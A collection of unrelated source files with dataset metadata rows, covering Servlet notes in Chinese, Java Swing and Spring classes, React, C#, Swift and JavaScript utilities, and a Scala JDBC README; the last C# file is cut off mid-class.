- 第五步:==执行destroy(),销毁线程==,在停止并且卸载Servlet时执行,负责释放资源初始化阶段:Servlet启动,会读取配置文件中的信息,构造指定的Servlet对象,创建ServletConfig对象,将ServletConfig作为参数来调用init()方法
### **五、Servlet过滤器的配置包括两部分**
- 第一部分是过滤器在Web应用中的定义,由<filter>元素表示,包括<filter-name>和<filter-class>两个必需的子元素
- 第二部分是过滤器映射的定义,由<filter-mapping>元素表示,可以将一个过滤器映射到一个或者多个Servlet或JSP文件,也可以采用url-pattern将过滤器映射到任意特征的URL。
|
Java
|
UTF-8
| 138 | 1.765625 | 2 |
[] |
no_license
|
package com.example.mindtray.memo;
public class TextContent extends MemoContent {
public TextContent(String name) {
super(name);
}
}
|
JavaScript
|
UTF-8
| 366 | 2.59375 | 3 |
[] |
no_license
|
import { React, useEffect, useState } from 'react';
const useDebounce = (value, delay) => {
const [deValue, setDeValue] = useState(value);
useEffect(() => {
const timer = setTimeout(() => {
setDeValue(value);
}, delay);
return () => {
clearTimeout(timer);
};
}, [value, delay]);
return deValue;
};
export default useDebounce;
|
Java
|
UTF-8
| 2,026 | 2.015625 | 2 |
[] |
no_license
|
package com.lab516.service.sys;
import java.io.Serializable;
import java.util.List;
import javax.persistence.Query;
import org.springframework.cache.annotation.CacheEvict;
import org.springframework.cache.annotation.Cacheable;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.lab516.base.BaseService;
import com.lab516.base.Consts;
import com.lab516.base.JPAQuery;
import com.lab516.base.Page;
import com.lab516.entity.sys.Config;
@Service
public class ConfigService extends BaseService<Config> {
private final String CACHE = "configCache";
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public Config insert(Config config) {
return super.insert(config);
}
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public Config update(Config config) {
return super.update(config);
}
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public void delete(Serializable id) {
super.delete(id);
}
@Cacheable(value = CACHE)
public String findValueByName(String cfg_name) {
String hql = "from Config where cfg_name = :cfg_name";
Query query = em.createQuery(hql);
query.setParameter("cfg_name", cfg_name);
List<Config> list = query.getResultList();
return list.isEmpty() ? null : list.get(0).getCfg_value();
}
public String findApkUrl() {
return findValueByName(Consts.CFG_NAME_APK_URL);
}
public String findApkVesion() {
return findValueByName(Consts.CFG_NAME_APK_VER);
}
public String findTipMessage() {
return findValueByName(Consts.CFG_TIP_MESSAGE);
}
public Page findPage(int page_no, int page_size, String cfg_id, String cfg_name, String cfg_value) {
JPAQuery query = createJPAQuery();
query.whereNullableContains("cfg_id", cfg_id);
query.whereNullableContains("cfg_name", cfg_name);
query.whereNullableContains("cfg_value", cfg_value);
return query.getPage(page_no, page_size);
}
}
|
Markdown
|
UTF-8
| 809 | 2.921875 | 3 |
[
"MIT"
] |
permissive
|
# plainjdbc
[](https://travis-ci.org/dohque/plainjdbc)
Small Scala library inspired by Spring JdbcTemplate to execute generated sql statements over plain jdbc.
This library has no dependencies and is extremely easy to use.
Just add PlainJDBC dependency to your build.sbt.
```
"com.dohque" %% "plainjdbc" % "0.1-SNAPSHOT"
```
And start using it.
```scala
case class Item(id: Int, name: String)
class ItemsRepository(val dataSource: DataSource) extends JdbcStore {
def findById(id: Int): Try[Option[Item]] =
query("select id, name from Items where id = ?", List(id)).map {
case head :: _ => Some(new Item(head("id"), head("name")))
case _ => None
}
}
```
Released under MIT license.
|
Java
|
UTF-8
| 13,173 | 2.171875 | 2 |
[] |
no_license
|
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package talabat.clone.project;
/**
*
* @author Aya
*/
import java.awt.Color;
import java.awt.Container;
import java.awt.Font;
import java.awt.event.ActionEvent;
import java.awt.event.MouseEvent;
import java.awt.event.MouseListener;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.swing.ButtonGroup;
import javax.swing.JButton;
import javax.swing.JCheckBox;
import javax.swing.JComboBox;
import javax.swing.JFrame;
import static javax.swing.JFrame.EXIT_ON_CLOSE;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPasswordField;
import javax.swing.JRadioButton;
import javax.swing.JTextArea;
import javax.swing.JTextField;
import javax.swing.border.LineBorder;
//import static talabat.clone.Login_Coustomer.darkOrange;
/**
*
* @author Aya
*/
public class Register extends Name_X {
JLabel l6 =new JLabel (" Address: ");
JTextField Address=new JTextField();
JLabel l8 =new JLabel (" Confirm Password: ");
JPasswordField ConfirmPassword=new JPasswordField();
JLabel l7 =new JLabel (" Mobile: ");
JTextField Mobile=new JTextField();
JButton Submit=new JButton("Submit");
JButton Signin=new JButton("SIGNIN");
SubmitMouse Submitmouse=new SubmitMouse();
RestMouse restMouse =new RestMouse();
JLabel switch_to_owner=new JLabel("Switch to owner");
public static Data data=new Data();
public Register()
{
//updated 23/3/2021
Color col = new Color(255,90,0);
switch_to_owner.setForeground(col);
switch_to_owner.setBounds(165, 600, 150,100);
switch_to_owner.setFont(new java.awt.Font("Calibri", 0, 17));
switch_to_owner.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
background.add(switch_to_owner);
switch_to_owner.addMouseListener(restMouse);
background1.setBounds(-170, 0, 780, 300);
l1.setBounds(50, 320, 100, 25);
background.add(l1);
UserName.setBounds(210, 320, 180, 25);
background.add(UserName);
l2.setBounds(50, 360, 100, 25);
background.add(l2);
Password.setBounds(210, 360, 180, 25);
background.add(Password);
l8.setBounds(20, 400, 180, 25);
background.add(l8);
ConfirmPassword.setBounds(210, 400, 180, 25);
background.add(ConfirmPassword);
l6.setBounds(10, 440, 180, 25);
background.add(l6);
Address.setBounds(210, 440, 180, 25);
background.add(Address);
l7.setBounds(10, 480, 180, 25);
background.add(l7);
Mobile.setBounds(210, 480, 180, 25);
background.add(Mobile);
Submit.setBounds(40, 560, 150, 34);
background.add(Submit);
Signin.setBounds(250, 560, 150, 34);
background.add(Signin);
l6.setFont(new java.awt.Font("Calibri", 0, 18));
l6.setForeground(new java.awt.Color(255, 90, 0));
l6.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l6.setBackground(Color.white);
l7.setFont(new java.awt.Font("Calibri", 0, 18));
l7.setForeground(new java.awt.Color(255, 90, 0));
l7.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l7.setBackground(Color.white);
l8.setFont(new java.awt.Font("Calibri", 0, 18));
l8.setForeground(new java.awt.Color(255, 90, 0));
l8.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l8.setBackground(Color.white);
Address.setForeground(new java.awt.Color(255, 90, 0));
Address.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
Address.setFont(new java.awt.Font("Calibri", 0, 18));
Address.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
ConfirmPassword.setForeground(new java.awt.Color(255, 90, 0));
ConfirmPassword.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
ConfirmPassword.setFont(new java.awt.Font("Calibri", 0, 18));
ConfirmPassword.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Mobile.setForeground(new java.awt.Color(255, 90, 0));
Mobile.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
Mobile.setFont(new java.awt.Font("Calibri", 0, 18));
Mobile.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Submit.setBackground(new java.awt.Color(255, 90, 0));
Submit.setForeground(Color.white);
Submit.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Submit.setFont(new java.awt.Font("Gadugi", 1, 18));
Submit.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
//Submit.addMouseListener(signMouse);
Submit.addMouseListener(Submitmouse);
Signin.setBackground(new java.awt.Color(255, 90, 0));
Signin.setForeground(Color.white);
Signin.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Signin.setFont(new java.awt.Font("Gadugi", 1, 18));
Signin.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
Signin.addMouseListener(restMouse);
}
public class SubmitMouse implements MouseListener
{
@Override
public void mouseClicked(MouseEvent e) {
if (e.getSource()==Submit)
{
String username=UserName.getText();
String password=Password.getText();
int pass=Password.getPassword().length;
String confirmpassword=new String(ConfirmPassword.getPassword());
int confirm=ConfirmPassword.getText().length();
String address=Address.getText();
String Mobilenumber=Mobile.getText();
int mobileNumber=Mobile.getText().length();
if (username.isEmpty()||password.isEmpty()||confirmpassword.isEmpty()||address.isEmpty()||Mobilenumber.isEmpty())
{
JOptionPane.showConfirmDialog(null,"You must fill all fields completely","Error",JOptionPane.ERROR_MESSAGE);
}
else if (!Pattern.matches("[a-zA-Z]+", username))
{
JOptionPane.showConfirmDialog(null,"Tha name is Invalid","Error",JOptionPane.ERROR_MESSAGE);
UserName.setText("");
}else if (pass<6)
{
JOptionPane.showConfirmDialog(null,"Password must be greater than 6","Error",JOptionPane.ERROR_MESSAGE);
Password.setText("");
}else if (!(password.equals(confirmpassword)))
{
JOptionPane.showConfirmDialog(null,"Password confitmation is wrong","Error",JOptionPane.ERROR_MESSAGE);
Password.setText("");
ConfirmPassword.setText("");
}else if (!(mobileNumber==11))
{
JOptionPane.showConfirmDialog(null,"Mobile Number must contain 11 numbers","Error",JOptionPane.ERROR_MESSAGE);
Mobile.setText("");
}
else if(!Pattern.matches("^[0-9]+$", Mobilenumber))
{
JOptionPane.showConfirmDialog(null,"Mobile Number must contain numbers only","Error",JOptionPane.ERROR_MESSAGE);
Mobile.setText("");
}
else
{
//Data.data.numberOfUsers++;
/*Data.data.user_name[Data.data.numberOfUsers]=username;
Data.data.user_password[Data.data.numberOfUsers]=password;
Data.data.user_address[Data.data.numberOfUsers]=address;
Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobilenumber;*/
checkData(address, username, Mobilenumber, password);
//restaurants_page obj=new restaurants_page();
Submit.setForeground(new Color(255,90,0));
Submit.setBackground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
@Override
public void mousePressed(MouseEvent e) {
}
@Override
public void mouseReleased(MouseEvent e) {
}
@Override
public void mouseEntered(MouseEvent e) {
if(e.getSource()==Submit)
{
Submit.setForeground(new Color(255,90,0));
Submit.setBackground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
@Override
public void mouseExited(MouseEvent e) {
if(e.getSource()==Submit)
{
Submit.setBackground(new Color(255,90,0));
Submit.setForeground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
public class RestMouse implements MouseListener
{
@Override
public void mouseClicked(MouseEvent e) {
if(e.getSource()==switch_to_owner)
{
LogIn_Owner2 o=new LogIn_Owner2();
dispose();
}
if (e.getSource()==Signin)
{
Login_Coustomer o=new Login_Coustomer();
dispose();
/*UserName.setText("");
Password.setText("");
ConfirmPassword.setText("");
Address.setText("");
Mobile.setText("");*/
}
}
@Override
public void mousePressed(MouseEvent e) {
}
@Override
public void mouseReleased(MouseEvent e) {
}
@Override
public void mouseEntered(MouseEvent e) {
if(e.getSource()==Signin)
{
Signin.setForeground(new Color(255,90,0));
Signin.setBackground(Color.white);
Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
@Override
public void mouseExited(MouseEvent e) {
if(e.getSource()==Signin)
{
Signin.setBackground(new Color(255,90,0));
Signin.setForeground(Color.white);
Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
public void checkData(String address,String UserName,String mobile,String pass)
{
boolean flag=false;
for (int i = 0; i <= Data.data.numberOfUsers; i++) {
if (UserName.equals(Data.data.user_name[i])&&address.equals(Data.data.user_address[i])&&mobile.equals(Data.data.user_mobile_number[i]))
{
JOptionPane.showConfirmDialog(null,"This account is already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if (UserName.equals(Data.data.user_name[i]))
{
JOptionPane.showConfirmDialog(null,"User name already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if (mobile.equals(Data.data.user_mobile_number[i]))
{
JOptionPane.showConfirmDialog(null,"Mobile number already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if(!(UserName.equals(Data.data.user_name[i]))&&!(address.equals(Data.data.user_address[i]))&&!(mobile.equals(Data.data.user_mobile_number[i])))
{
flag=true;
}
}
if(flag==true)
{
JOptionPane.showConfirmDialog(null,"Successfully registered. ","Error",JOptionPane.ERROR_MESSAGE);
saveData(UserName,pass,address,mobile);
Login_Coustomer y=new Login_Coustomer();
dispose();
}
}
public void saveData(String name,String pass,String Address,String Mobile)
{
Data.data.numberOfUsers++;
Data.data.user_name[Data.data.numberOfUsers]=name;
Data.data.user_password[Data.data.numberOfUsers]=pass;
Data.data.user_address[Data.data.numberOfUsers]=Address;
Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobile;
}
}
|
C#
|
UTF-8
| 2,584 | 2.640625 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Speech.Recognition;
using System.Speech.Synthesis;
using System.Speech.AudioFormat;
using System.Windows.Forms;
namespace domotica
{
public class SpeechToText
{
DictationGrammar dictation;
SpeechRecognitionEngine sr;
RichTextBox textBox;
string finalResult;
bool isCompleted = false;
public void getVoice()
{
try
{
textBox.Text = "";
dictation = new DictationGrammar();
sr = new SpeechRecognitionEngine();
sr.LoadGrammar(dictation);
sr.SetInputToDefaultAudioDevice();
sr.RecognizeAsync(RecognizeMode.Multiple);
//sr.SpeechHypothesized -= new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);
sr.SpeechRecognized -= new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);
sr.EmulateRecognizeCompleted -= new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);
//sr.SpeechHypothesized += new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);
sr.SpeechRecognized += new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);
sr.EmulateRecognizeCompleted += new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);
}
catch
{
}
}
public void SpeechRecognized(object sender, SpeechRecognizedEventArgs e)
{
try
{
finalResult = e.Result.Text;
textBox.Text += " " + finalResult;
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
private void EmulateRecognizeCompletedHandler(object sender, EmulateRecognizeCompletedEventArgs e)
{
try
{
isCompleted = true;
sr.UnloadGrammar(dictation);
sr.RecognizeAsyncStop();
textBox.Text += "\n\nCompleted. \n";
MessageBox.Show("Completed. ");
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
public SpeechToText( RichTextBox aTextBox )
{
textBox = aTextBox;
}
}
}
|
C#
|
UTF-8
| 633 | 2.6875 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace ClassLibrary1
{
public class Class1:IItf1,IItf2
{
void IItf1.Abc()
{
}
void IItf2.Abc()
{
}
private int aaa1;
}
class MyClasssub :Class1
{
private int a;
}
class MyClassSubSub : MyClasssub
{
private int c;
}
class MyClassSubSubSub : MyClassSubSub
{
private int b;
}
public interface IItf1
{
void Abc();
}
public interface IItf2
{
void Abc();
}
}
|
Java
|
UTF-8
| 723 | 2.34375 | 2 |
[] |
no_license
|
package cn.com.do1.mock.util;
import cn.com.do1.mock.model.TUserInfo;
import lombok.extern.slf4j.Slf4j;
import java.util.HashMap;
import java.util.Map;
/**
* @Author huangKun
* @Date 2021/3/24
**/
@Slf4j
public class LocalCacheUtil {
public static Map<String, TUserInfo> USER_CACHE = new HashMap<>();
static RedisUtil redisUtil = new RedisUtil();
static {
log.info(">>>>>>loading static block");
USER_CACHE.put("user1", (TUserInfo)redisUtil.getByKey("user1"));
}
public TUserInfo getUserCache(String userId){
if (null == USER_CACHE){
log.info(">>>>>>static block not load");
return null;
}
return USER_CACHE.get(userId);
}
}
|
JavaScript
|
UTF-8
| 406 | 3.09375 | 3 |
[
"MIT"
] |
permissive
|
/* Convert string to lower case.
*
* |Name |Desc |
* |------|------------------|
* |str |String to convert |
* |return|Lower cased string|
*/
/* example
* lowerCase('TEST'); // -> 'test'
*/
/* module
* env: all
*/
/* typescript
* export declare function lowerCase(str: string): string;
*/
_('toStr');
exports = function(str) {
return toStr(str).toLocaleLowerCase();
};
|
Swift
|
UTF-8
| 2,762 | 2.53125 | 3 |
[
"Apache-2.0"
] |
permissive
|
import UIKit
import main
@objc class ViewController: UIViewController, GameEngineCallbacks {
@IBOutlet weak var titleLabel: UILabel!
@IBOutlet weak var b11: UIButton!
@IBOutlet weak var b12: UIButton!
@IBOutlet weak var b13: UIButton!
@IBOutlet weak var b21: UIButton!
@IBOutlet weak var b22: UIButton!
@IBOutlet weak var b23: UIButton!
@IBOutlet weak var b31: UIButton!
@IBOutlet weak var b32: UIButton!
@IBOutlet weak var b33: UIButton!
@IBOutlet weak var winnerLabel: UILabel!
@IBOutlet weak var newGame: UIButton!
func clearUIField() {
// buttons
let arr = [b11, b12, b13, b21, b22, b23, b31, b32, b33]
for elem in arr {
elem?.setTitle("_", for: .normal)
}
winnerLabel.text = ""
}
func showZero(i: Int32, j: Int32) {
// buttons
let arr = [[b11, b12, b13], [b21, b22, b23], [b31, b32, b33]]
arr[Int(i)][Int(j)]?.setTitle("o", for: .normal)
}
func showWinner(message: String) {
winnerLabel.text = message
}
private var engine: GameEngine?
// Lifecycle
override func viewDidLoad() {
super.viewDidLoad()
engine = GameEngine(callbacks: self)
titleLabel.text = CommonKt.createApplicationScreenMessage()
engine?.startNewGame()
}
// Actions
@IBAction func onNewGameClick(_ sender: Any) {
engine?.startNewGame()
}
@IBAction func onB11Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 0)
}
@IBAction func onB12Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 1)
}
@IBAction func onB13Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 2)
}
@IBAction func onB21Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 0)
}
@IBAction func onB22Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 1)
}
@IBAction func onB23Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 2)
}
@IBAction func onB31Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 0)
}
@IBAction func onB32Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 1)
}
@IBAction func onB33Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 2)
}
}
|
JavaScript
|
UTF-8
| 10,157 | 3.0625 | 3 |
[
"MIT"
] |
permissive
|
/**
* Watcher for click, double-click, or long-click event for both mouse and touch
* @example
* import { clicked } from 'clicked'
*
* function handleClick()
* {
* console.log('I was clicked.')
* }
*
* const div = document.getElementById('clickme')
* const c = clicked(div, handleClick, { threshold: 15 })
*
* // change callback
* c.callback = () => console.log('different clicker')
*
* // destroy
* c.destroy()
*
* // using built-in querySelector
* clicked('#clickme', handleClick2)
*
* // watching for all types of clicks
* function handleAllClicks(e) {
* switch (e.type)
* {
* case 'clicked': ...
* case 'double-clicked': ...
* case 'long-clicked': ...
* }
*
* // view UIEvent that caused callback
* console.log(e.event)
* }
* clicked('#clickme', handleAllClicks, { doubleClicked: true, longClicked: true })
*/
var __assign = (this && this.__assign) || function () {
__assign = Object.assign || function(t) {
for (var s, i = 1, n = arguments.length; i < n; i++) {
s = arguments[i];
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))
t[p] = s[p];
}
return t;
};
return __assign.apply(this, arguments);
};
var defaultOptions = {
threshold: 10,
clicked: true,
mouse: true,
touch: true,
doubleClicked: false,
doubleClickedTime: 300,
longClicked: false,
longClickedTime: 500,
capture: false,
clickDown: false
};
/**
* @param element element or querySelector entry (e.g., #id-name or .class-name)
* @param callback called after a click, double click, or long click is registered
* @param [options]
* @param [options.threshold=10] threshold of movement to cancel all events
* @param [options.clicked=true] dispatch event for clicked
* @param [options.mouse=true] whether to listen for mouse events; can also be used to set which mouse buttons are active
* @param [options.touch=true] whether to listen for touch events; can also be used to set the number of touch points to accept
* @param [options.doubleClicked] dispatch event for double click
* @param [options.doubleClickedTime=500] wait time in millseconds for double click
* @param [options.longClicked] dispatch event for long click
* @param [options.longClickedTime=500] wait time for long click
* @param [options.clickDown] dispatch event for click down
* @param [options.capture] events will be dispatched to this registered listener before being dispatched to any EventTarget beneath it in the DOM tree
*/
export function clicked(element, callback, options) {
return new Clicked(element, callback, options);
}
var Clicked = /** @class */ (function () {
function Clicked(element, callback, options) {
if (typeof element === 'string') {
element = document.querySelector(element);
if (!element) {
console.warn("Unknown element: document.querySelector(" + element + ") in clicked()");
return;
}
}
this.element = element;
this.callback = callback;
this.options = __assign(__assign({}, defaultOptions), options);
this.createListeners();
}
Clicked.prototype.createListeners = function () {
var _this = this;
this.events = {
mousedown: function (e) { return _this.mousedown(e); },
mouseup: function (e) { return _this.mouseup(e); },
mousemove: function (e) { return _this.mousemove(e); },
touchstart: function (e) { return _this.touchstart(e); },
touchmove: function (e) { return _this.touchmove(e); },
touchcancel: function () { return _this.cancel(); },
touchend: function (e) { return _this.touchend(e); }
};
this.element.addEventListener('mousedown', this.events.mousedown, { capture: this.options.capture });
this.element.addEventListener('mouseup', this.events.mouseup, { capture: this.options.capture });
this.element.addEventListener('mousemove', this.events.mousemove, { capture: this.options.capture });
this.element.addEventListener('touchstart', this.events.touchstart, { passive: true, capture: this.options.capture });
this.element.addEventListener('touchmove', this.events.touchmove, { passive: true, capture: this.options.capture });
this.element.addEventListener('touchcancel', this.events.touchcancel, { capture: this.options.capture });
this.element.addEventListener('touchend', this.events.touchend, { capture: this.options.capture });
};
/** removes event listeners added by Clicked */
Clicked.prototype.destroy = function () {
this.element.removeEventListener('mousedown', this.events.mousedown);
this.element.removeEventListener('mouseup', this.events.mouseup);
this.element.removeEventListener('mousemove', this.events.mousemove);
this.element.removeEventListener('touchstart', this.events.touchstart);
this.element.removeEventListener('touchmove', this.events.touchmove);
this.element.removeEventListener('touchcancel', this.events.touchcancel);
this.element.removeEventListener('touchend', this.events.touchend);
};
Clicked.prototype.touchstart = function (e) {
if (this.down === true) {
this.cancel();
}
else {
if (e.touches.length === 1) {
this.handleDown(e, e.changedTouches[0].screenX, e.changedTouches[0].screenY);
}
}
};
Clicked.prototype.pastThreshold = function (x, y) {
return Math.abs(this.lastX - x) > this.options.threshold || Math.abs(this.lastY - y) > this.options.threshold;
};
Clicked.prototype.touchmove = function (e) {
if (this.down) {
if (e.touches.length !== 1) {
this.cancel();
}
else {
var x = e.changedTouches[0].screenX;
var y = e.changedTouches[0].screenY;
if (this.pastThreshold(x, y)) {
this.cancel();
}
}
}
};
/** cancel current event */
Clicked.prototype.cancel = function () {
this.down = false;
if (this.doubleClickedTimeout) {
clearTimeout(this.doubleClickedTimeout);
this.doubleClickedTimeout = null;
}
if (this.longClickedTimeout) {
clearTimeout(this.longClickedTimeout);
this.longClickedTimeout = null;
}
};
Clicked.prototype.touchend = function (e) {
if (this.down) {
e.preventDefault();
this.handleClicks(e);
}
};
Clicked.prototype.handleClicks = function (e) {
var _this = this;
if (this.options.doubleClicked) {
this.doubleClickedTimeout = this.setTimeout(function () { return _this.doubleClickedCancel(e); }, this.options.doubleClickedTime);
}
else if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
if (this.longClickedTimeout) {
clearTimeout(this.longClickedTimeout);
this.longClickedTimeout = null;
}
this.down = false;
};
Clicked.prototype.handleDown = function (e, x, y) {
var _this = this;
if (this.doubleClickedTimeout) {
if (this.pastThreshold(x, y)) {
if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
this.cancel();
}
else {
this.callback({ event: e, type: 'double-clicked' });
this.cancel();
}
}
else {
this.lastX = x;
this.lastY = y;
this.down = true;
if (this.options.longClicked) {
this.longClickedTimeout = this.setTimeout(function () { return _this.longClicked(e); }, this.options.longClickedTime);
}
if (this.options.clickDown) {
this.callback({ event: e, type: 'click-down' });
}
}
};
Clicked.prototype.longClicked = function (e) {
this.longClickedTimeout = null;
this.down = false;
this.callback({ event: e, type: 'long-clicked' });
};
Clicked.prototype.doubleClickedCancel = function (e) {
this.doubleClickedTimeout = null;
if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
};
Clicked.prototype.checkMouseButtons = function (e) {
if (this.options.mouse === false) {
return false;
}
else if (this.options.mouse === true) {
return true;
}
else if (e.button === 0) {
return this.options.mouse.includes('left');
}
else if (e.button === 1) {
return this.options.mouse.includes('middle');
}
else if (e.button === 2) {
return this.options.mouse.includes('right');
}
};
Clicked.prototype.mousedown = function (e) {
if (this.checkMouseButtons(e)) {
if (this.down === true) {
this.down = false;
}
else {
this.handleDown(e, e.screenX, e.screenY);
}
}
};
Clicked.prototype.mousemove = function (e) {
if (this.down) {
var x = e.screenX;
var y = e.screenY;
if (this.pastThreshold(x, y)) {
this.cancel();
}
}
};
Clicked.prototype.mouseup = function (e) {
if (this.down) {
e.preventDefault();
this.handleClicks(e);
}
};
Clicked.prototype.setTimeout = function (callback, time) {
return setTimeout(callback, time);
};
return Clicked;
}());
export { Clicked };
/**
* Callback for
* @callback Clicked~ClickedCallback
* @param {UIEvent} event
* @param {('clicked'|'double-clicked'|'long-clicked'|'click-down')} type
*/
|
Java
|
UTF-8
| 1,147 | 2.625 | 3 |
[] |
no_license
|
package com.example.asuper.gesturerecognizer.sensor;
import org.junit.Test;
import static org.hamcrest.CoreMatchers.*;
import static org.junit.Assert.*;
public class SensorDataRegulatorTest {
@Test
public void correctAverageData() {
SensorDataRegulator regulator = new SensorDataRegulator();
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
float[] data = regulator.getAverageData();
assertThat(data, equalTo(new float[]{1, 1, 1}));
}
@Test
public void listCleaningNeeded() {
SensorDataRegulator regulator = new SensorDataRegulator();
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.pushData(new float[]{1, 1, 1});
regulator.getAverageData();
regulator.pushData(new float[]{2, 1, 1});
regulator.pushData(new float[]{2, 1, 1});
regulator.pushData(new float[]{2, 1, 1});
float[] data = regulator.getAverageData();
assertThat(data, equalTo(new float[]{2, 1, 1}));
}
}
|
Java
|
UTF-8
| 497 | 2.21875 | 2 |
[] |
no_license
|
package cn.mobiledaily.domain;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
public final class Converter {
private static final ObjectMapper MAPPER = new ObjectMapper();
public static String toJson(Object object) {
try {
return MAPPER.writeValueAsString(object);
} catch (JsonProcessingException e) {
throw new IllegalStateException("can not convert to json.");
}
}
}
|
JavaScript
|
UTF-8
| 1,907 | 2.953125 | 3 |
[] |
no_license
|
"use strict";
module.exports = {
guid: function() {
return Math.floor( ( 1 + Math.random() ) * 0x10000 ).toString( 16 );
},
clone: function( obj ){
var clone = {};
if( obj === null || typeof( obj ) !== "object" ){
return obj;
}
for( var i in obj ){
if( obj.hasOwnProperty( i ) && typeof( obj[i] ) === "object" && obj[i] !== null ){
clone[i] = this.clone( obj[i] );
}
else {
clone[i] = obj[i];
}
}
return clone;
},
uniqueElementById: function( arrayUnique, arrayToAdd ){
for( var i = 0; i < arrayToAdd.length; i++ ){
var item = arrayToAdd[i];
var isNew = false;
if( arrayUnique.length === 0 ){
arrayUnique.push( item );
}
else {
isNew = true;
for( var j = 0; j < arrayUnique.length; j++ ){
var uniqueItem = arrayUnique[j];
if( uniqueItem.id === item.id ){
isNew = false;
}
}
}
if( isNew ){
arrayUnique.push(item);
}
}
return arrayUnique;
},
dateToString : function( date ){
var dayOfMonth = (date.getDate() < 10) ? "0" + date.getDate() : date.getDate() ;
var month = (date.getMonth() < 10) ? "0" + date.getMonth() : date.getMonth() ;
var curHour = date.getHours() < 10 ? "0" + date.getHours() : date.getHours();
var curMinute = date.getMinutes() < 10 ? "0" + date.getMinutes() : date.getMinutes();
var curSeconds = date.getSeconds() < 10 ? "0" + date.getSeconds() : date.getSeconds();
return curHour + "h:" + curMinute + "m:" + curSeconds + "s " + dayOfMonth + "/" + month;
}
};
|
C#
|
UTF-8
| 2,879 | 2.546875 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using UJEP_WinformPainting.Classes.ColorCon;
using UJEP_WinformPainting.Classes.Managers.LivePreview;
using UJEP_WinformPainting.Classes.Managers.Memory;
using UJEP_WinformPainting.Classes.PaitingObjects;
using UJEP_WinformPainting.Classes.Tools;
namespace UJEP_WinformPainting.Classes.Managers.Main
{
public class MainManager : ILivePreview
{
public readonly IPaintingMemoryManager MemoryManager;
public Tool SelectedTool { get; set; }
public PaintingObject SelectedObject { get; set; }
public ColorContainer SelecedColorContainer { get; private set; }
public MainManager(IPaintingMemoryManager memoryManager)
{
this.MemoryManager = memoryManager;
this.SelectedTool = Tool.Default;
this.SelecedColorContainer = ColorContainer.Default;
}
public void UpdatePreview(Point currentMousePosition, PaintingObject paintingObject)
{
if (paintingObject != null)
paintingObject.Update(currentMousePosition);
}
